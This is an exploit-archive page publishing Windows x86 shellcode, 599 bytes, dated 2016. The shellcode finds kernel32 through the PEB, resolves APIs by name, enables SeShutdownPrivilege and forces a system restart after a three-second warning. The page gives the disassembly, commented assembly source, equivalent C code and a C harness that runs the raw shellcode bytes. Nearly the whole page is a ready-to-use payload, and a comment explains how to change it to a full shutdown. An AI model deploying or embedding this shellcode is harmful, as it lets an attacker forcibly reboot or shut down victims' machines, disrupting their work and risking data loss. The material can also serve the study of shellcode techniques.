Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)



EKU-ID: 5791 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-08-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
    # Title: Windows x86 InitiateSystemShutdownA() shellcode
    # Date : 18-08-2016
    # Author : Roziul Hasan Khan Shifat
    # Tested on : Windows 7 x86 starter
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx
 
00000023 <g>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <g>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <g>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <g>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   89 cf                   mov    %ecx,%edi
  4d:   31 c0                   xor    %eax,%eax
  4f:   50                      push   %eax
  50:   83 ec 1c                sub    $0x1c,%esp
  53:   8d 34 24                lea    (%esp),%esi
  56:   89 16                   mov    %edx,(%esi)
  58:   50                      push   %eax
  59:   68 6f 6b 65 6e          push   $0x6e656b6f
  5e:   68 65 73 73 54          push   $0x54737365
  63:   68 50 72 6f 63          push   $0x636f7250
  68:   68 4f 70 65 6e          push   $0x6e65704f
  6d:   8d 04 24                lea    (%esp),%eax
  70:   50                      push   %eax
  71:   51                      push   %ecx
  72:   ff d2                   call   *%edx
  74:   89 46 04                mov    %eax,0x4(%esi)
  77:   83 c4 10                add    $0x10,%esp
  7a:   31 c9                   xor    %ecx,%ecx
  7c:   68 73 41 42 42          push   $0x42424173
  81:   88 4c 24 01             mov    %cl,0x1(%esp)
  85:   68 6f 63 65 73          push   $0x7365636f
  8a:   68 6e 74 50 72          push   $0x7250746e
  8f:   68 75 72 72 65          push   $0x65727275
  94:   68 47 65 74 43          push   $0x43746547
  99:   8d 0c 24                lea    (%esp),%ecx
  9c:   51                      push   %ecx
  9d:   57                      push   %edi
  9e:   8b 16                   mov    (%esi),%edx
  a0:   ff d2                   call   *%edx
  a2:   83 c4 14                add    $0x14,%esp
  a5:   89 46 08                mov    %eax,0x8(%esi)
  a8:   31 c9                   xor    %ecx,%ecx
  aa:   68 65 73 73 41          push   $0x41737365
  af:   88 4c 24 03             mov    %cl,0x3(%esp)
  b3:   68 50 72 6f 63          push   $0x636f7250
  b8:   68 45 78 69 74          push   $0x74697845
  bd:   8d 0c 24                lea    (%esp),%ecx
  c0:   51                      push   %ecx
  c1:   57                      push   %edi
  c2:   8b 16                   mov    (%esi),%edx
  c4:   ff d2                   call   *%edx
  c6:   83 c4 0c                add    $0xc,%esp
  c9:   89 46 0c                mov    %eax,0xc(%esi)
  cc:   31 c9                   xor    %ecx,%ecx
  ce:   51                      push   %ecx
  cf:   68 61 72 79 41          push   $0x41797261
  d4:   68 4c 69 62 72          push   $0x7262694c
  d9:   68 4c 6f 61 64          push   $0x64616f4c
  de:   8d 0c 24                lea    (%esp),%ecx
  e1:   51                      push   %ecx
  e2:   57                      push   %edi
  e3:   8b 16                   mov    (%esi),%edx
  e5:   ff d2                   call   *%edx
  e7:   83 c4 0c                add    $0xc,%esp
  ea:   68 2e 64 6c 6c          push   $0x6c6c642e
  ef:   68 70 69 33 32          push   $0x32336970
  f4:   68 61 64 76 61          push   $0x61766461
  f9:   8d 0c 24                lea    (%esp),%ecx
  fc:   51                      push   %ecx
  fd:   ff d0                   call   *%eax
  ff:   83 c4 0c                add    $0xc,%esp
 102:   89 c7                   mov    %eax,%edi
 104:   31 c9                   xor    %ecx,%ecx
 106:   68 41 42 42 42          push   $0x42424241
 10b:   88 4c 24 01             mov    %cl,0x1(%esp)
 10f:   68 61 6c 75 65          push   $0x65756c61
 114:   68 65 67 65 56          push   $0x56656765
 119:   68 69 76 69 6c          push   $0x6c697669
 11e:   68 75 70 50 72          push   $0x72507075
 123:   68 4c 6f 6f 6b          push   $0x6b6f6f4c
 128:   8d 0c 24                lea    (%esp),%ecx
 12b:   51                      push   %ecx
 12c:   50                      push   %eax
 12d:   8b 16                   mov    (%esi),%edx
 12f:   ff d2                   call   *%edx
 131:   83 c4 18                add    $0x18,%esp
 134:   89 46 10                mov    %eax,0x10(%esi)
 137:   31 c9                   xor    %ecx,%ecx
 139:   68 73 41 41 41          push   $0x41414173
 13e:   88 4c 24 01             mov    %cl,0x1(%esp)
 142:   68 6c 65 67 65          push   $0x6567656c
 147:   68 72 69 76 69          push   $0x69766972
 14c:   68 6b 65 6e 50          push   $0x506e656b
 151:   68 73 74 54 6f          push   $0x6f547473
 156:   68 41 64 6a 75          push   $0x756a6441
 15b:   8d 0c 24                lea    (%esp),%ecx
 15e:   51                      push   %ecx
 15f:   57                      push   %edi
 160:   8b 16                   mov    (%esi),%edx
 162:   ff d2                   call   *%edx
 164:   83 c4 18                add    $0x18,%esp
 167:   89 46 14                mov    %eax,0x14(%esi)
 16a:   31 c9                   xor    %ecx,%ecx
 16c:   68 77 6e 41 42          push   $0x42416e77
 171:   88 4c 24 03             mov    %cl,0x3(%esp)
 175:   68 75 74 64 6f          push   $0x6f647475
 17a:   68 65 6d 53 68          push   $0x68536d65
 17f:   68 53 79 73 74          push   $0x74737953
 184:   68 69 61 74 65          push   $0x65746169
 189:   68 49 6e 69 74          push   $0x74696e49
 18e:   8d 0c 24                lea    (%esp),%ecx
 191:   51                      push   %ecx
 192:   57                      push   %edi
 193:   8b 16                   mov    (%esi),%edx
 195:   ff d2                   call   *%edx
 197:   83 c4 18                add    $0x18,%esp
 19a:   89 46 18                mov    %eax,0x18(%esi)
 19d:   31 c0                   xor    %eax,%eax
 19f:   50                      push   %eax
 1a0:   83 ec 14                sub    $0x14,%esp
 1a3:   8d 3c 24                lea    (%esp),%edi
 
000001a6 <proc_start>:
 1a6:   8b 46 08                mov    0x8(%esi),%eax
 1a9:   ff d0                   call   *%eax
 1ab:   31 d2                   xor    %edx,%edx
 1ad:   8d 17                   lea    (%edi),%edx
 1af:   52                      push   %edx
 1b0:   31 c9                   xor    %ecx,%ecx
 1b2:   b1 28                   mov    $0x28,%cl
 1b4:   51                      push   %ecx
 1b5:   50                      push   %eax
 1b6:   8b 4e 04                mov    0x4(%esi),%ecx
 1b9:   ff d1                   call   *%ecx
 1bb:   8d 57 04                lea    0x4(%edi),%edx
 1be:   8d 52 04                lea    0x4(%edx),%edx
 1c1:   8d 12                   lea    (%edx),%edx
 1c3:   31 c9                   xor    %ecx,%ecx
 1c5:   68 65 67 65 41          push   $0x41656765
 1ca:   88 4c 24 03             mov    %cl,0x3(%esp)
 1ce:   68 69 76 69 6c          push   $0x6c697669
 1d3:   68 77 6e 50 72          push   $0x72506e77
 1d8:   68 75 74 64 6f          push   $0x6f647475
 1dd:   68 53 65 53 68          push   $0x68536553
 1e2:   8d 0c 24                lea    (%esp),%ecx
 1e5:   31 db                   xor    %ebx,%ebx
 1e7:   52                      push   %edx
 1e8:   51                      push   %ecx
 1e9:   53                      push   %ebx
 1ea:   8b 5e 10                mov    0x10(%esi),%ebx
 1ed:   ff d3                   call   *%ebx
 1ef:   8d 57 04                lea    0x4(%edi),%edx
 1f2:   31 c9                   xor    %ecx,%ecx
 1f4:   41                      inc    %ecx
 1f5:   89 0a                   mov    %ecx,(%edx)
 1f7:   8d 52 04                lea    0x4(%edx),%edx
 1fa:   41                      inc    %ecx
 1fb:   89 4a 08                mov    %ecx,0x8(%edx)
 1fe:   31 d2                   xor    %edx,%edx
 200:   52                      push   %edx
 201:   52                      push   %edx
 202:   52                      push   %edx
 203:   8d 57 04                lea    0x4(%edi),%edx
 206:   52                      push   %edx
 207:   31 d2                   xor    %edx,%edx
 209:   52                      push   %edx
 20a:   8b 17                   mov    (%edi),%edx
 20c:   52                      push   %edx
 20d:   8b 56 14                mov    0x14(%esi),%edx
 210:   ff d2                   call   *%edx
 212:   31 c9                   xor    %ecx,%ecx
 214:   51                      push   %ecx
 215:   68 6e 64 73 21          push   $0x2173646e
 21a:   68 73 65 63 6f          push   $0x6f636573
 21f:   68 41 20 33 20          push   $0x20332041
 224:   68 6d 2e 45 54          push   $0x54452e6d
 229:   68 79 73 74 65          push   $0x65747379
 22e:   68 6e 67 20 53          push   $0x5320676e
 233:   68 61 72 74 49          push   $0x49747261
 238:   68 52 65 73 74          push   $0x74736552
 23d:   8d 1c 24                lea    (%esp),%ebx
 240:   41                      inc    %ecx
 241:   51                      push   %ecx
 242:   31 c9                   xor    %ecx,%ecx
 244:   51                      push   %ecx
 245:   b1 03                   mov    $0x3,%cl
 247:   51                      push   %ecx
 248:   53                      push   %ebx
 249:   31 c9                   xor    %ecx,%ecx
 24b:   51                      push   %ecx
 24c:   8b 4e 18                mov    0x18(%esi),%ecx
 24f:   ff d1                   call   *%ecx
 251:   8b 4e 0c                mov    0xc(%esi),%ecx
 254:   50                      push   %eax
 255:   ff d1                   call   *%ecx
 
 
*/
 
 
 
/*
HANDLE 4 bytes
TOKEN_PRIVILEGES 16 bytes
 
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = 40
LUID_AND_ATTRIBUTES 12 bytes
LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
SE_PRIVILEGE_ENABLED = 2
 
 
required functions:
 
1.  WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
2.  WINBASEAPI HANDLE WINAPI GetCurrentProcess (VOID);
 
3.  WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
4.  WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
5.  WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);
 
6.GetProcAddress()
7.ExitProcess()
8.LoadLibraryA() [1 time use]
 
 
 
required dll:
 
1.kernel32.dll
2.kernel32.dll
 
3.advapi32.dll
4.advapi32.dll
5.advapi32.dll
 
6.kernel32.dll
7.kernel32.dll
8.kernel32.dll
 
 
required macro and custom data types:
 
 
#define ANYSIZE_ARRAY 1
    
    
     typedef struct _TOKEN_PRIVILEGES {
      DWORD PrivilegeCount;
      LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
    } TOKEN_PRIVILEGES,*PTOKEN_PRIVILEGES;
    
    
     typedef struct _LUID_AND_ATTRIBUTES {
      LUID Luid;
      DWORD Attributes;
    } LUID_AND_ATTRIBUTES,*PLUID_AND_ATTRIBUTES;
    typedef LUID_AND_ATTRIBUTES LUID_AND_ATTRIBUTES_ARRAY[ANYSIZE_ARRAY];
    typedef LUID_AND_ATTRIBUTES_ARRAY *PLUID_AND_ATTRIBUTES_ARRAY;
    
    
    
     typedef struct _LUID {
    DWORD LowPart;
    LONG HighPart;
  } LUID,*PLUID;
    
 
c code:
 
 
#include <windows.h>
#include<stdio.h>
#include<process.h>
#include<io.h>
 
int main(){
    HANDLE h;
    TOKEN_PRIVILEGES t;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
    return 0;
    
    
    
    
    LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&t.Privileges[0].Luid);
    t.PrivilegeCount=1;
    t.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    
    
    
    AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);
    
    InitiateSystemShutdown(NULL,"shutting",10,FALSE,1);
}
*/
 
/*
section .text
    global _start
_start:
 
xor ecx,ecx
 
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll base address
 
 
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
xor edx,edx
 
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
 
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
 
mov edi,ecx ;kernel32.dll
 
xor eax,eax
push eax
sub esp,28
 
lea esi,[esp]
 
mov [esi],dword edx ;GetProcAddress() at offset 0
 
 
;---------------------------------
;finding address of OpenProcessToken()
 
push eax
push 0x6e656b6f
push 0x54737365
push 0x636f7250
push 0x6e65704f
 
lea eax,[esp]
push eax
push ecx
 
call edx
;-----------------------------------
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10
;-------------------------
 
;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173
mov [esp+1],byte cl
push 0x7365636f
push 0x7250746e
push 0x65727275
push 0x43746547
 
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;-------------------------
add esp,20
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8
;----------------------------------
 
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
lea ecx,[esp]
 
push ecx
push edi
mov edx,dword [esi]
call edx
;-----------------------
add esp,12
mov [esi+12],dword eax ;ExitProcess() at offset 12
;-------------------------------------------
 
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;--------------------
add esp,12
 
;LoadLibraryA("advapi32.dll")
push 0x6c6c642e
push 0x32336970
push 0x61766461
 
lea ecx,[esp]
push ecx
call eax
;--------------------------
add esp,12
mov edi,eax ; advapi32.dll
;------------------------------
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241
mov [esp+1],byte cl
push 0x65756c61
push 0x56656765
push 0x6c697669
push 0x72507075
push 0x6b6f6f4c
 
 
lea ecx,[esp]
push ecx
push eax
 
mov edx,dword [esi]
call edx
 
;---------------------------
add esp,0x18
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16
;-------------------------
 
;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173
mov [esp+1],byte cl
push 0x6567656c
push 0x69766972
push 0x506e656b
push 0x6f547473
push 0x756a6441
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;------------------------------------
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20
;---------------------------
 
;finding address of InitiateSystemShutdownA()
 
xor ecx,ecx
push 0x42416e77
mov [esp+3],byte cl
push 0x6f647475
push 0x68536d65
push 0x74737953
push 0x65746169
push 0x74696e49
 
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;-------------------------
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24
;-------------------------
 
xor eax,eax
push eax
 
 
sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address
 
 
;---------------------------------
;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24
 
;----------------------------------------
 
 
 
proc_start:
 
;---------------------------
;GetCurrentProcess()
 
mov eax,[esi+8]
call eax
 
;----------------------------
;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&HANDLE)
 
xor edx,edx
lea edx,[edi]
push edx
xor ecx,ecx
mov cl,40
 
push ecx
push eax
 
mov ecx,[esi+4]
call ecx
 
;--------------------------
;LookupPrivilegeValueA(NULL,SE_SHUTDOWN_NAME,&TOKEN_PRIVILEGES.Privileges[0].Luid);
 
lea edx,[edi+4]
lea edx,[edx+4]
 
 
lea edx,[edx]
 
xor ecx,ecx
 
push 0x41656765
mov [esp+3],byte cl
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553
 
lea ecx,[esp]
 
 
xor ebx,ebx
 
 
push edx
push ecx
push ebx
 
mov ebx,[esi+16]
call ebx
;----------------------------------
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4]
xor ecx,ecx
inc ecx
mov [edx],dword ecx
lea edx,[edx+4]
inc ecx
mov [edx+8],dword ecx
 
xor edx,edx
push edx
push edx
push edx
 
lea edx,[edi+4]
push edx
 
xor edx,edx
push edx
 
mov edx,dword [edi]
 
push edx
 
mov edx,[esi+20]
call edx
 
;----------------------------
;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);
 
xor ecx,ecx
 
 
;--------------------------
push ecx
push 0x2173646e
push 0x6f636573
push 0x20332041
push 0x54452e6d
push 0x65747379
push 0x5320676e
push 0x49747261
push 0x74736552
 
 
lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"
;------------------------------
 
inc ecx ;if U want to shutdown system , just remove this line
 
push ecx
 
xor ecx,ecx
push ecx
 
mov cl,3 ;3 seconds
push ecx
push ebx
xor ecx,ecx
push ecx
 
 
mov ecx,[esi+24]
call ecx
 
;--------------------------
;Exiting
mov ecx,[esi+12]
push eax
call ecx
*/
 
 
#include<stdio.h>
#include<string.h>
char shellcode[]=\
 
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xcf\x31\xc0\x50\x83\xec\x1c\x8d\x34\x24\x89\x16\x50\x68\x6f\x6b\x65\x6e\x68\x65\x73\x73\x54\x68\x50\x72\x6f\x63\x68\x4f\x70\x65\x6e\x8d\x04\x24\x50\x51\xff\xd2\x89\x46\x04\x83\xc4\x10\x31\xc9\x68\x73\x41\x42\x42\x88\x4c\x24\x01\x68\x6f\x63\x65\x73\x68\x6e\x74\x50\x72\x68\x75\x72\x72\x65\x68\x47\x65\x74\x43\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x14\x89\x46\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x68\x2e\x64\x6c\x6c\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x0c\x89\xc7\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x61\x6c\x75\x65\x68\x65\x67\x65\x56\x68\x69\x76\x69\x6c\x68\x75\x70\x50\x72\x68\x4c\x6f\x6f\x6b\x8d\x0c\x24\x51\x50\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x10\x31\xc9\x68\x73\x41\x41\x41\x88\x4c\x24\x01\x68\x6c\x65\x67\x65\x68\x72\x69\x76\x69\x68\x6b\x65\x6e\x50\x68\x73\x74\x54\x6f\x68\x41\x64\x6a\x75\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x14\x31\xc9\x68\x77\x6e\x41\x42\x88\x4c\x24\x03\x68\x75\x74\x64\x6f\x68\x65\x6d\x53\x68\x68\x53\x79\x73\x74\x68\x69\x61\x74\x65\x68\x49\x6e\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x18\x31\xc0\x50\x83\xec\x14\x8d\x3c\x24\x8b\x46\x08\xff\xd0\x31\xd2\x8d\x17\x52\x31\xc9\xb1\x28\x51\x50\x8b\x4e\x04\xff\xd1\x8d\x57\x04\x8d\x52\x04\x8d\x12\x31\xc9\x68\x65\x67\x65\x41\x88\x4c\x24\x03\x68\x69\x76\x69\x6c\x68\x77\x6e\x50\x72\x68\x75\x74\x64\x6f\x68\x53\x65\x53\x68\x8d\x0c\x24\x31\xdb\x52\x51\x53\x8b\x5e\x10\xff\xd3\x8d\x57\x04\x31\xc9\x41\x89\x0a\x8d\x52\x04\x41\x89\x4a\x08\x31\xd2\x52\x52\x52\x8d\x57\x04\x52\x31\xd2\x52\x8b\x17\x52\x8b\x56\x14\xff\xd2\x31\xc9\x51\x68\x6e\x64\x73\x21\x68\x73\x65\x63\x6f\x68\x41\x20\x33\x20\x68\x6d\x2e\x45\x54\x68\x79\x73\x74\x65\x68\x6e\x67\x20\x53\x68\x61\x72\x74\x49\x68\x52\x65\x73\x74\x8d\x1c\x24\x41\x51\x31\xc9\x51\xb1\x03\x51\x53\x31\xc9\x51\x8b\x4e\x18\xff\xd1\x8b\x4e\x0c\x50\xff\xd1";
 
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}